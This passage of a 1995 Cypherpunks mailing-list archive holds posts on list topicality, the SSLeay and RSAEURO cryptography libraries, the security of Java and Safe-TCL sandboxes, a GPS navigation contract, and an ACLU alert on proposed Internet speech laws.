Date: Thu, 3 Aug 95 22:32:46 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Appropriate Topics?
In-Reply-To: <ac46a6d9010210043f4a@[205.199.118.202]>
Message-ID: <199508040532.BAA08605@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 8:35 PM 8/3/95, Ray Cromwell wrote:
> 
> >> Good idea.
> >>
> >> I would have some suggestions, but first
> >> an important question:
> >>
> >> Is it to be discussed on the Cypherpunks list?
> >
> >  I don't see why not. It's related to crypto, and it's related to
> >writing code. Or has the cypherpunks list degenerated into an arena
> >where the top subjects are the Waco hearings, paranoid government/NSA
> >rumors, US vs German censorhip, and irrelevent political messages?
> 
> As I see things, talking about Ray's ideas for an object-oriented crypto
> library is a big part of what this list is for. (Ditto for Wei Dai's code,
> for Hal's code, and so on.)
> 
> However, it's a mistake to think that the _only_ thing appropriate for the
> list is talking about code (of either kind). Not that Ray said this.

  Right, I wasn't saying that. I was being sarcastic. I have my mailbox
filled up everyday by noisey messages like that PBS under the
Republican's post (which is old, I saw it months ago), discussions of
the newest conspiracy behind the Randy Weaver incident, etc, without
uttering a peep. I just hit 'd' and go on. So I post a message about
crypto and coding, and all of a sudden I get accused of not being
on topic. I obviously put some time and thought into my message,
I experienced a weird sort of ironic feeling when I saw the comment
(about being off topic) Kinda like, "what is this world coming too
when an annoying 800 line policy analysis forward, and discussions
of the OJ trial are considered 'signal'"

 I don't think the only valuable contribution to c'punks is writing code,
in fact, I'm not writing code, I'm discussing theoretical abstractions.
All kinds of posting types from t-shirts, to meetings, to
political activism are valuable. In order to write code, you must
think about and discuss what you are going to write first.  In order
to fight politically, you must have discussion and debate. What I don't
think is valuable are these massive forwards, subscriptions of cypherpunks
to Web servers, and 2-line followups with snide remarks.

  Decrease the entropy. ;-)


-Ray


  
  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Fri, 4 Aug 95 04:42:44 PDT
To: mnorton@cavern.uark.edu
Subject: Noise: PBS under the Republicans (fwd)
In-Reply-To: <Pine.SOL.3.91.950803180422.29640D-100000@cavern>
Message-ID: <199508041138.AA22941@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Thu, 3 Aug 1995 18:04:50 -0500 (CDT)
   From: Mac Norton <mnorton@cavern.uark.edu>
   Mime-Version: 1.0
   Content-Type: TEXT/PLAIN; charset=US-ASCII
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk



   On Thu, 3 Aug 1995, Perry E. Metzger wrote:

   > 
   > What, exactly, does this have to do with cryptography?
   > 
   > .pm

   If you have to ask, you can't afford it.

   MacN

Oh, I get it! PBS is a steganography engine for all of those
big foundations?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 4 Aug 95 05:34:55 PDT
To: cypherpunks@toad.com
Subject: PRA_fix
Message-ID: <199508041234.IAA00106@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-4-95. NYPaper:


   "A Contract Is Awarded To Improve Navigation."

      The Federal Aviation Administration yesterday awarded a
      contract to greatly improve a navigation system that
      would let civilians pinpoint their locations anywhere in
      the United States to within 21 feet.

      The augmentation would consist of 36 receiving stations
      in the United States, each fixed in a precisely surveyed
      spot. Each station would listen electronically for the
      signals given off by the halo of satellites, and
      calculate what the satellites were saying about the
      station's location. But the station, bolted down, would
      not rely on the satellites to determine its location; it
      would already know that precisely.

      The central office, listening to all 36 stations, would
      establish a correction factor. It would radio the
      correction factor to a different satellite, one in
      geosynchronous orbit over the United States, meaning
      that its position did not change relative to the earth's
      surface.

      The geosynchronous satellite would radio a correction
      factor back to planes in flight, or any other user. The
      plane would also receive signals from the G.P.S.
      satellites, calculate a position, apply the correction
      factor and fix its location.


   PRA_fix











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 4 Aug 95 05:40:37 PDT
To: cypherpunks@toad.com
Subject: WYE_not
Message-ID: <199508041240.IAA00566@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Absent crypto, but present priv-gov fee-fame combat:

   The New Yorker of July 31 writes on the indictment of six
   lawyers in Miami on drug-conspiracy charges.


   "The Thin White Line: Federal indictment in Miami depicts
   six defense lawyers as virtual traitors in the war on
   drugs. Is the government overreaching?"


   WYE_not (about 28K, in two parts)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 4 Aug 95 05:43:34 PDT
To: cypherpunks@toad.com
Subject: SURVEY: Money on the Internet
Message-ID: <v02120d00ac47c59cf12f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I saw this in sci.econ. I filled it out, but mostly I'm interested in the
results.  The survey seems pretty thorough, mostly crypto-aware, and it
includes a question about the value of anonymity...

Cheers,
Bob Hettinga


: From: weiler@ic.ac.uk (Mr R.M. Weiler)
: Newsgroups: sci.econ
: Subject: SURVEY: Money on the Internet
: Date: 31 Jul 1995 11:15:02 GMT
: Organization: Imperial College of Science, Technology and Medicine, London
: Lines: 18
: Sender: r.m.weiler@ic.ac.uk
:  Followup-To:
: Message-ID: <3vidvm$lnm@oban.cc.ic.ac.uk>
: NNTP-Posting-Host: sg1.cc.ic.ac.uk
:
: Hi there!
:
: I am doing a research on the use of money on the Internet. I would
: appreciate it if you could answer a short survey on this subject, found at
: the following Web site:
:
:        http://graph.ms.ic.ac.uk/money
:
: I would also appreciate any remark on this survey. Please tell your friend
: about it, too.
:
: Many thanks!
:
: Roy Weiler
: The Management School
: Imperial College
: e-mail: r.m.weiler@ic.ac.uk

--
Robert Hettinga (rah@shipwright.com)  "There is no difference between
Shipwright Development Corporation     someone who eats too little
44 Farquhar Street                     and sees Heaven and someone
Boston, MA 02331 USA                   who drinks too much and sees
(617) 323-7923                         snakes."   -- Bertrand Russell
Phree Phil: Email: zldf@clark.net http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 4 Aug 95 05:46:47 PDT
To: cypherpunks@toad.com
Subject: FIPS number for SHA - The Next Generation
Message-ID: <199508041246.IAA11750@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Since I last asked a while back, have the folks at NIST published a
new version of the SHA FIPS with the small modifications made to it to
"repair" the defect?  I need the information for an RFC that is being
submitted to the RFC editor today so its kind of important...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 3 Aug 95 15:53:01 PDT
To: Jason Weisberger <jweis@primenet.com>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <199508032140.OAA09085@usr2.primenet.com>
Message-ID: <Pine.HPP.3.91.950804083519.1790B-100000@saturn.mincom.oz.au>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 3 Aug 1995, Jason Weisberger wrote:
> Maybe I miss it, but when did this arrive?  Is anyone testing it?

I started writting the library back at the start or april.
It has been available for ftp for a month or 2 now but I'm still working 
on it.  I have only mentioned it on a few mailing lists and am holding 
off its anouncment on sci.crypt until we have the windows 3.1 DLL working 
fully (well, we have it working now but I'm still cleaning things up a 
bit :-).  It even compiles under DOS :-)

It is a free (for comercial and non-comercial use) complete 
implementation of netscapes SSL v 2.  The SSL part of the library is 
quite small, most of the rest is support routines for the x509 
environment. I have routines for DES (my libdes library), RC4, IDEA, RSA, 
MD2, MD5.  I have support routines to generate RSA private keys and I 
have programs to generate, and certify x509 certificates.
Tim Hudson has put SSL in ftp, telnet, Moasic, httpd etc.  These patches 
are available from the same ftp site.
For those in the USA, you can build to use RSAref and can build with RC4 
and or IDEA removed.

All code in this 'library' has been written by me from publicaly 
available material.  Documentation of the non SSL part is quite small 
since I have mostly been coding and nearly all of this work has been done 
outside of my normal work hours.

People have been using the library quite a bit, and we can interoperate 
with netscape secure servers and their clients (if we have a certificate 
signed by netscape).

Have a play and please send me any comments :-)

http://www.psy.uq.oz.au/~ftp/Crypto/
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/

eric

--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups that the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 4 Aug 95 05:55:45 PDT
To: cypherpunks@toad.com
Subject: Re: PRA_fix
Message-ID: <v02120d01ac47c6952bb7@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>   8-4-95. NYPaper:
>
>
>   "A Contract Is Awarded To Improve Navigation."
[snip]
>      The geosynchronous satellite would radio a correction
>      factor back to planes in flight, or any other user. The
>      plane would also receive signals from the G.P.S.
>      satellites, calculate a position, apply the correction
>      factor and fix its location.

This is called an active location system, and it was originally disigned by
G.K. O'Neill (The Princeton Physics Prof., Space Studies Institute founder,
the guy who came up with all those spiffy space-settlement ideas in the
late seventies -- see Babylon 5 for a picture ;-) -- and the inventor of
the mass driver, among other things), under the name of Geostar, in the
early 1980's. It's accuracy was supposed to be 6 inches in 2 dimensions,
and 6 feet in 3 diminsions.  The FAA didn't like it because they didn't
invent it, the DOD hated it because they wanted to commercialize GPS and
they didn't want anything so accurate for civilian purposes.  The
transponders were going to be beensy little things about the size of pagers
relying on high-energy burst transmissions.

ObCrypto/Privacy: It relied on a fast computer on the ground to calculate
where you were, it allowed short messages, and presumably it was going to
send them in the clear. It also had a "panic" button function, where
someone in trouble could summon help no matter where they were.

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 4 Aug 95 06:10:51 PDT
To: strick at Jihad <strick@yak.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199508032138.VAA00125@jihad.yak.net>
Message-ID: <199508041310.JAA02958@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



strick at Jihad writes:
> Perry -- do you have the same basic objection to Safe-TCL that you do
> do to Java?  I would think so.

I do, but not as strongly. The language is much more constrained and
actually does have a lot of the evil bits ripped clear out (or at
least they could be ripped out.)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 4 Aug 95 10:02:55 PDT
To: cypherpunks@toad.com
Subject: Re:  Java and Safe-TCL security
Message-ID: <199508041701.KAA10421@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The safe-tcl mailing list has not been active for a few months.  I think
a lot of interest has transferred to Java.  One problem is that safe-tcl
was oriented around email, so it lacks facilities for accessing web
pages.

I agree with Ray that the security of safe-tcl leaves something to be
desired.  I implemented a safe-tcl mail filter which would automatically
run incoming mail scripts which were in safe-tcl format.  This would be a
generalization of a remailer, so that users could write scripts which
would determine when the remailing would occur, etc.  However I ran into
a number of problems, particularly related to persistent storage (e.g.
disk file access).  This is a hard problem for a "safe" system to solve.

One solution is to just forbid it, but beyond that you need to have rules
about how much disk space a script can use, whether they can access each
other's space, etc.  There are some nice applications if they can do so,
for example the telescript model where two software agents come together
and exchange some information.

Another tricky issue is if you are going to let the script talk to the
outside world via email or tcp connections.  How do you prevent abuse of
this feature (sending junk email, or connecting to a web page and
entering bogus data into a form)?  But again, without this capability the
script is pretty much limited to drawing pretty pictures on your screen,
which isn't very useful.

Here is one message I sent to the safe-tcl list earlier this year
describing some of these problems in a little more detail.  Note that
there were also several bugs in the implementation which left security
holes, things being checked in the wrong context and such.  This is
similar to what Ray was citing.

Hal

> From owner-safe-tcl@CS.UTK.EDU  Fri Feb 10 22:30:35 1995
> X-Resent-To: safe-tcl@CS.UTK.EDU ; Sat, 11 Feb 1995 01:22:02 EST
> Date: Fri, 10 Feb 1995 22:21:28 -0800
> From: Hal <hfinney@shell.portal.com>
> To: safe-tcl@CS.UTK.EDU
> Subject: setconfigdata and delivery time
> Status: R
> 
> The spec appears to allow delivery-time scripts to do setconfigdata.
> This is a mechanism for a script to store persistent data.  One application
> would be a telescript-like interaction between scripts.  Some data could
> be stored by one script and later read by another.  More interesting, a
> script could even store some script, perhaps some or all of itself, into this
> persistent store.  That script could then be read and eval'd by a later
> script.  This way scripts could in effect call subroutines in each other,
> providing somewhat similar functionality to telescript's procedure calls
> between agents.
> 
> At activation time the user gets asked whenever a script does
> getconfigdata, although oddly not when a script does setconfigdata.
> Also, the .safetcl.conf file is written on any getconfigdata after the
> user has supplied or confirmed a database value.  This will have the
> side effect of writing out any setconfigdata values which have been
> previously set by the script.
> 
> At delivery time the current implementation will not ask the user since
> there is no user to ask, which causes the writing out of the config data
> base never to happen.  So there is actually no way for a delivery time
> script to set a persistent value right now.  It would be easy to change
> the code to allow delivery time scripts to set persistent values with
> setconfigdata.
> 
> However, this does open up a possible avenue for abuse.  There is
> presently no limit on how much data is written with setconfigdata.  And
> actually if the idea above were used where scripts put themselves into
> the database for later running then the database could legitimately be
> quite large.  The problem would arise if a script abused this capability
> by filling the disk with junk database entries.
> 
> Maybe something is needed analogous to AutoConfirmMailHook to determine
> whether a given SafeTcl_setconfigdata should be able to go out to the
> disk.  It would want to be given the data as input and possibly also
> the size of the current database.  Maybe there should be a counter of how
> many times the current script has written to the database (or perhaps the
> hook could retain this information itself).
> 
> Two other points: as mentioned before the use of the database to retain
> "system" information conflicts with its use for this purpose.  If
> database entries like "mailer" or "external-site" are changed and saved
> to .safetcl.conf, that could break later invocations of swish.  I think
> this system data should be somewhere else (or else there needs to be
> another form of persistent store for scripts).
> 
> Secondly, the code right now checks the SafeTcl_evaluation_time
> variable in the restricted interpreter to decide whether it should ask
> the user.  This is not reliable as the untrusted script could change
> SafeTcl_evaluation_time.  In other places the code checks
> SafeTcl_InterfaceStyle and if it is empty then it doesn't ask.  That
> seems safer.
> 
> Hal Finney
> hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Russell Whitaker <whitaker@sgihub.corp.sgi.com>
Date: Fri, 4 Aug 95 10:07:03 PDT
To: cypherpunks@toad.com
Subject: SuperMac Sentinel: Customer Support tale
Message-ID: <199508041706.KAA20363@extropia.csd.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


jfg@fuente.engr.sgi.com (John Gibbon) wrote:
>I got this from a friend, who got it from a friend, 
>	who got it from a friend ...
>
> --------------------------------------
>SuperMac records a certain number of technical support calls at
>random, to  keep tabs on customer satisfaction.  By wild "luck", they
>managed to catch the following conversation on tape.
>
>Some poor SuperMac TechSport got a call from some middle level
>official from the legitimate government of Trinidad.  The fellow spoke
>very good English, and fairly calmly described the problem.
>
>It seemed that was a coup attempt in progress at that moment. However,
>the national armoury for that city was kept in the same building as
>the Legislature, and it seems that there was a combination lock on the
>door to the armoury. Of the people in the capitol city that day, only
>the  Chief of the Capitol Guard and the Chief Armourer knew the
>combination to the lock, and they had already been killed.
>
>So, this officer of the government of Trinidad continued, the problem
>is this.  The combination to the lock is stored in a file on the
>Macintosh, but the file has been encrypted with the SuperMac product
>called Sentinel.  Was there any chance, he asked, that there was a
>"back door" to the application, so they could get the combination,
>open the armoury door, and defend the Capitol Building and the
>legitimately elected government of Trinidad against the insurgents?
>
>All the while he is asking this in a very calm voice, there is the
>sound of gunfire in the background. The Technical Support guy put the
>person on hold.
>
>A phone call to the phone company verified that the origin of the call
>was in fact Trinidad.  Meanwhile, there was this mad scramble to see
>if anybody knew of any "back doors" in the Sentinel program. As it
>turned out, Sentinel uses DES to encrypt the files, and there was no
>known back door.  The Tech Support fellow told the customer that aside
>from trying to guess the password, there was no way through Sentinel,
>and that they'd be better off trying to physically destroy the lock.
>
>The official was very polite, thanked him for the effort, and hung up.
>That night, the legitimate government of Trinidad fell.  One of the
>BBC reporters mentioned that the casualties seemed heaviest in the
>capitol, where for some reason, there seemed to be little return fire
>from the government forces.
>
>
>


-- 
Russell Earl Whitaker	                       whitaker@sgi.com
Webmaster, Silicon Junction			   
Silicon Graphics, Inc.	                      Mountain View, CA
===============================================================
http://reality.sgi.com/employees/whitaker



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NSA Spook <remailer@spook.alias.net>
Date: Fri, 4 Aug 95 08:39:48 PDT
To: toad.com.mix-l@jpunix.com.rops-l@c2.org
Subject: to usura
Message-ID: <199508041537.KAA14043@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


usura
cfs coming
send note to list if you receive




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 4 Aug 95 07:59:58 PDT
To: perry@piermont.com
Subject: Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
In-Reply-To: <199508041310.JAA02958@panix4.panix.com>
Message-ID: <199508041459.KAA11345@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> strick at Jihad writes:
> > Perry -- do you have the same basic objection to Safe-TCL that you do
> > do to Java?  I would think so.
> 
> I do, but not as strongly. The language is much more constrained and
> actually does have a lot of the evil bits ripped clear out (or at
> least they could be ripped out.)

  The same applies to Java. Anything can be ripped out of Java by removing
the classes with the "native" methods on the local side. The class loader
will barf at an object that references a class that doesn't exist. In fact,
since that class contains the only way possible to access that privelege
(it encapsulates all the nasty unix system calls you don't want to allow)
there is no way for the untrusted code to call for instance, open(),
because it doesn't know the address of it. Java does compile-time
emasculation. (the compiler I'm speaking of is the Java compiler which
must be run from the shell. The compiler is not a part of the browser)


Now Safe-TCL has another mode of failure altogether. First of all, the way
the interpreter is made "safe" is to take a fully working tcl interpreter
(with full priveleges) at run time, and use TclDeleteCommand() to remove
offending commands. Safe-TCL is not emasculated at compile time, but at
run time. Now what if this removal-of-dangerous-commands process fails
sometime, or fails to remove just a single command, because of say, a
fence-post error, and that command just happens to be 'exec'?
Furthermore, two interpreters are created, a "safe" one and an "unsafe"
one. It is very possible for a programmer to accidently pass the pointer
to the wrong interpreter. You should be nervous of an unsafe interpreter
ever existing at all.
 

Lastly, "declareharmless" allows priveleges to be added to Safe-TCL at
run time, vs Java which only allows that by recompiling Java classes.
If by any means, a trusted interpreter ever gets to execute this command,
all is lost.


One last comment: Java is a language specification, not an implementation
specification. Sun wants Java to be a free and open language with other
vendors creating compilers and runtime environments. Whether or not
the Java runtime executes in a separate process space, chrooted(), etc
is an implementation detail. In fact, I'm not totally sure that Hotjava
doesn't do this already. Implementation details are not documented in
the Java papers available at the Java home page.


You have to read more than just the Java whitepaper to get an estimation
of its security. 

-Ray
  


 
 

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Thu, 3 Aug 95 20:45:17 PDT
To: Jason Weisberger <jweis@primenet.com>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <199508032140.OAA09085@usr2.primenet.com>
Message-ID: <Pine.LNX.3.91.950804104356.9665A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Jason Weisberger wrote:

> Maybe I miss it, but when did this arrive?  Is anyone testing it?

You may take a look at http://www.psy.uq.oz.au/~ftp/Crypto/

My initial enthusiasm has somewhat vanished when I've realized that a 
free SSL implementation doesn't automatically allow to build a 
Netsite-compatible server: without a certificate issued by Verisign on 
behalf of Netscape Communications, Netscape Navigator won't talk to it.
As SSL has some intrinsic points of weakness, I don't see the point
of sticking to it to secure the TCP layer.
For details, see also http://petrified.cic.net/~altitude/ssl/ssl.saga.html

On the other hand, the CryptoTCP approach (see the file ctcp.0.9.tar.gz
at ftp://utopia.hacktic.nl/pub/crypto) looks promising. Is anybody 
working on it? I'm interested in exchanging ideas, as I'm thinking
of adding CryptoTCP client capabilities to a SOCKS 4.2 daemon. 
I see three major areas for improvement:

1. A better PRNG for the session key
2. Authentication of the D-H key exchange with digital signatures, a` la 
Photuris
3. Less "hard-wired" structure: at present, for example, the module size 
for D-H calculations is fixed at 1024 bits.

1. and 2. are relatively easy, but 3. would require a lot of work.

Also, being able to negotiate different encryption algorithm in addition 
to triple-DES wouldn't be bad.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Brenton" <Chris.Brenton@newsedge.com>
Date: Fri, 4 Aug 95 08:59:51 PDT
To: cypherpunks@toad.com
Subject: to usura
Message-ID: <9508041202.AA14456@herne.newsedge.com>
MIME-Version: 1.0
Content-Type: text/plain


Original-From: NSA Spook <remailer@spook.alias.net>
Original-Date: Fri, 4 Aug 1995 10:37:00 -0500


>usura
>cfs coming
>send note to list if you receive

Thank you for posting this to the list. 

I needed some more useless mail...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Fri, 4 Aug 95 09:42:23 PDT
To: ACLUNATL@aol.com
Subject: House Adopts Exon-Like Speech Crimes, Also Adopts Cox/Wyden Amendment
Message-ID: <950804121746_47881732@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


8/4/95 
ACLU Cyber-Liberties Alert: 
House Adopts Exon-Like Speech Crimes,
Also Adopts Cox/Wyden Amendment
--------------------------------------------------------- 
At 9:10 am today, the House of Representatives voted to adopt an omnibus
"Managers Amendment" to the telecommunications bill (HR 1555), which included
new Exon-like speech crimes that would censor the Internet.   At 11:58 am,
the House of Representatives voted 420 to 4 to adopt the Cox/Wyden amendment
to the telco bill.  The Cox/Wyden amendment, however, was not designed to --
and does not -- affect the Exon-like speech crimes provisions added to the
telco bill by the House.

Speech Crimes Provisions in Managers Amendment:

The  Managers Amendment containing the new speech crimes provisions also
contained some forty other unrelated amendments.  The Exon-like provisions
were not a focus of the debate, and it is likely that most members cast their
votes for reasons unrelated to these provisions.

The Managers Amendment adds an entirely new Exon-like provision to the
existing federal obscenity laws. The provision would make it a crime to
"intentionally communicate by computer ... to any person the communicator
believes has not attained the age of 18 years, any material that, in context,
depicts or describes, in terms patently offensive as measured by contemporary
community standards, sexual or excretory activities or organs."  (18 U.S.C.
1465)

This provision, like the Exon amendment passed by the Senate, would
effectively reduce all online content to that which is suitable only for
children.  It also raises the same questions about service provider
liability that were raised by the Exon amendment.

The Managers Amendment would also make it a crime to "receive" prohibited
material "by computer," thereby subjecting both Internet users and service
providers to new prosecutions (18 U.S.C. 1462).

Assuming that the House telco bill (HR 1555) is approved (which is highly
probable by 3 pm today), both the House and Senate versions of the telco bill
will include severe attacks on cyber-liberties.

Cox/Wyden Amendment:

The ACLU has supported the general approach of the Cox/Wyden amendment
because it prohibits FCC regulation of content on the Internet and generally
supports private sector initiatives, not government censorship, on
cyberspace.  As the ACLU has said before, there are several ambiguities and
some real problems with the Cox/Wyden amendment.  The two sponsors have
committed to working with us on resolving the problems.  (See previously
posted ACLU Online Analysis of the Cox/Wyden Bill.)

-----------------------------------------------------------
For the online community to take comfort in what is done in the final telco
bill in the conference committee, at a minimum the following must occur:

1.  The Senate's Exon/Coats amendment (the Communications Decency Act) must
be rejected -- that is, deleted from the bill, not merely modified in some
way.

2.  The House's Exon-like speech crimes amendment must be rejected -- that
is, deleted from the bill, not merely modified in some way.

3.  The ambiguities and problems in the Cox/Wyden amendment must be resolved
and then the Cox/Wyden amendment as modified should be included in the telco
bill.

The ACLU urges all those who care about free speech and personal privacy to
focus their energized efforts on all three fronts of the fight.
 
The ACLU will continue to fight all aspects of the cyber-censorship battle,
including the Exon-like speech crimes provisions just passed by the House,
the Exon/Coats amendment in the Senate, the Dole/Grassley anti-computer
pornography bill, the Grassley anti-electronic racketeering bill, and the
Feinstein anti-explosives information amendment to the counter-terrorism
bill.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 4 Aug 95 10:29:20 PDT
To: cypherpunks@toad.com
Subject: NIST/NCSSC National Information Systems Security Conference
Message-ID: <9508041729.AA04377@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



A couple of days ago I got a booklet about the 
"18th National Information Systems Security Conference 
(formerly the National Computer Security Conference) "
being held October 10-13 in Baltimore.  

Just a little excerpt about it:

One of the tracks is "The Internet and Beyond"
Several of the sessions look rather interesting.
The "Management and Administration" track includes 
at least two sessions by D. Denning of Georgetown Univ.
One of them is "Legalities: Will Encryption Keep Out Hackers"
and the other is "Critical Factors of Key Escrow Encryption 
Systems".  The first of those has a panel of S. Bellovin of AT&T,
M. Higgins of DISA, S. Kent of BBN, and E. Spafford of COAST.

So, is this a converence that is really worth something,
or something that the management heads might learn something at? ;-)

I guess that ordering my personal set of the Rainbow books
gets me on more lists than I thought :-)

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rsaeuro - General <rsaeuro@sourcery.demon.co.uk>
Date: Fri, 4 Aug 95 05:49:21 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCE:- RSAEURO Version 1.00
Message-ID: <12@sourcery.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


ANNOUNCE:- RSAEURO Version 1.00
===============================

What is RSAEURO?
----------------

RSAEURO is a cryptographic toolkit providing various functions for the use
of digital signatures, data encryption and supporting areas (PEM 
encoding, random number generation etc).  To aid compatibility with 
existing software, RSAEURO is call-compatible with RSADSI's "RSAREF(tm)" 
toolkit. RSAEURO allows non-US residents to make use of much of the 
cryptographic software previously only (legally) available in the US.

RSAEURO contains support for the following:

*    RSA encryption, decryption and key generation.  Compatible with 'RSA
     Laboratories' Public-Key Cryptography Standard (PKCS) #1.

*    Generation and verification of message digests using MD2, MD4, MD5 and
     SHS (SHS currently not implemented in higher-level functions to
     maintain compatibility with PKCS).

*    DES encryption and decryption using CBC (1, 2 or 3 keys using
     Encrypt-Decrypt-Encrypt) and DESX(tm), RSADSI's secure DES
     enhancement.

*    Diffie-Hellman key agreement as defined in PKCS #3.

*    PEM support support for RFC 1421 encoded ASCII data with all main
     functions.

*    Key routines implemented in assembler for speed (80386 and 680x0
     currently supported).

International Use
-----------------

IMPORTANT NOTICE:  Please do not distribute or use this software in the
US   it is 'illegal' to use this toolkit in the US, as PKP have a patent 
to public-key cryptography.  If you are a US resident, please use the 
RSAREF toolkit instead.

Ftp Sites
---------

RSAEURO can be found at

ftp://ftp.dsi.unimi.it/pub/security/crypt/code
ftp://ftp.ox.ac.uk/pub/crypto/misc

Author Details
--------------

With comments and suggestions, please address them to Stephen Kapp, at
'rsaeuro@sourcery.demon.co.uk'

----------------------------------------------------------------------------
RSAEURO:      rsaeuro@sourcery.demon.co.uk
RSAEURO Bugs: rsaeuro-bugs@sourcery.demon.co.uk

RSAEURO - Copyright (c) J.S.A.Kapp 1994-1995.
All Trademarks Acknowledged.
----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 4 Aug 95 10:42:24 PDT
To: "Kari Laine" <buster@klaine.pp.fi>
Subject: Re: EU Data Protection
Message-ID: <199508041742.NAA21367@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:43 PM 8/4/95 +0002, Kari Laine wrote:

>Excuse me - what the f**k is this?  Does it bear some truth in it
>or is it just a bad joke? If it is not a joke where to get the damn
>text - thanks. Sorry for the language but this does  sound just
>the thing I have heard some rumours of and which certainly
>would result in banning strong crypto.


http://snyside.sunnyside.com/cpsr/privacy/privacy_international/internationa
l_laws/ec_data_protection_directive_1995.txt

Has the preliminary text.  The final won't be up for a while but won't be
that different.  Also try:

http://www.open.gov.uk/dpr/dprhome.htm

The UK Data Protection Registrar's home page.  They've been trying to
control electronically stored records since 1984.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 4 Aug 95 11:42:24 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: House Adopts Exon-Like Speech Crimes, Also Adopts Cox/Wyden , Amendment
In-Reply-To: <950804121746_47881732@aol.com>
Message-ID: <Pine.ULT.3.91.950804134123.7683B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 4 Aug 1995 ACLUNATL@aol.com wrote:

> At 9:10 am today, the House of Representatives voted to adopt an omnibus
> "Managers Amendment" to the telecommunications bill (HR 1555), which included
> new Exon-like speech crimes that would censor the Internet.   At 11:58 am,
> the House of Representatives voted 420 to 4 to adopt the Cox/Wyden amendment
> to the telco bill.  The Cox/Wyden amendment, however, was not designed to --
> and does not -- affect the Exon-like speech crimes provisions added to the
> telco bill by the House.

420 to 4 eh?  Was Newt one of those people that voted against it since he 
publicly came out as opposed to it?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMCJOBjokqlyVGmCFAQGSCAP/V4MoKB8U5IwR4yBOEjx12SyE/K0gsnqU
YnPcwt4yiaGvj8gcw5LY8PsuN+VKMldq1OZbQxyKxCERacvuYV8+iCPKszCOJAcq
